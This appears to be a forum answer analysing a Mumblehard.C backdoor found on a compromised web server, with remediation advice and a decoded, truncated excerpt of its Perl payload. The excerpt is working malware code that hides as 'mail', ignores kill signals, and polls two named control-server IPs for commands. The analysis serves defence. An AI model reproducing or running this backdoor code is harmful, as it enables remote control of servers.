Bitcoin mining attack
This appears to be the payload from the Mumblehard.C backdoor. This file allows arbitrary code execution from the control servers listed in the file and would be able to execute with the permissions of the www-data user.
I would certainly backup your data and reinstall however the scope of this backdoor should only be the www-data user and was likely due to an out of date WordPress installation.
It's intentionally making it hard to kill. You can instead kill all processes running under the www-data user if you need to try to mitigate it while the system is still running.
The file in /var/tmp is a perl script that encodes another perl script using uuencode format. You didn't include the whole thing but here's what it looks like as plain text so far:
#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
$0 = "mail"; $| = 1; &main();
sub main
{
exit 0 unless defined (my $pid = fork);
exit 0 if $pid;
POSIX::setsid();
$SIG{$_} = "IGNORE" for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD));
umask 0;
chdir "/";
open (STDIN, "</dev/null");
open (STDOUT, ">/dev/null");
open (STDERR, ">&STDOUT");
my $url = ["77.72.83.137","93.88.74.243"];
my $rnd = ["a".."z", "A".."Z"]; $rnd = join ("", @$rnd[map {rand @$rnd}(1..(6 + int rand 5))]);
my $dir = "/var/tmp"; if (open (F, ">", "/tmp/$rnd")) { close F; unlink "/tmp/$rnd"; $dir ="/tmp"; }
my ($header, $content);
my ($link, $file, $id, $command, $timeout) = ("en.wikipedia.org", "index.html", 1, 96, 10);
foreach my $rs (@$url)
{
$header = "$dir/" . time; $content = $header . "1";
unlink $header if -f $header; unlink $content if -f $content;
&http($rs, $timeout, $header, $content, 0);
if (open (F, "<", $header))
{
flock F, 1;
my ($test, $task) = (0, "");
while (<F>)
{
s/^\s*([^\s]?.*)$/$1/;
s/^(.*[^\s])\s*$/$1/;
next unless length $_;
$test ++ if $_ eq "HTTP/1.0 200 OK" || $_ eq "Connection: close"; $task = $1 if /^Set-Cookie: PHPSESSID=([^;]+)/;
}
close F;
($link, $file, $id, $command, $timeout) = &decxd($task) if $test == 2 && length $task;
}
unlink $header if -f $header; unlink $content if -f $conten
This appears to closely parallel the code from here:
http://hardwarefetish.com/681-mumblehard-c-trojan-unpacked
Where 77.72.83.137 and 93.88.74.243 are the control servers. Both these IPs are registered in Russia and are for VPSs. One of the IPs are listed for spam activity:
https://mxtoolbox.com/SuperTool.aspx?action=blacklist%3a93.88.74.243&run=toolpage
As these IPs get indexed in search engines expect the attacker to disable them automatically. Although I doubt it much matters since the VPSs aren't going to help you out legally anyway.